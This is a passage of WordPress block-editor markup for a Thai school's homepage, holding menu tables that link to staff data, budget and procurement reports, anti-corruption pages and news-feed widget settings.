data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, 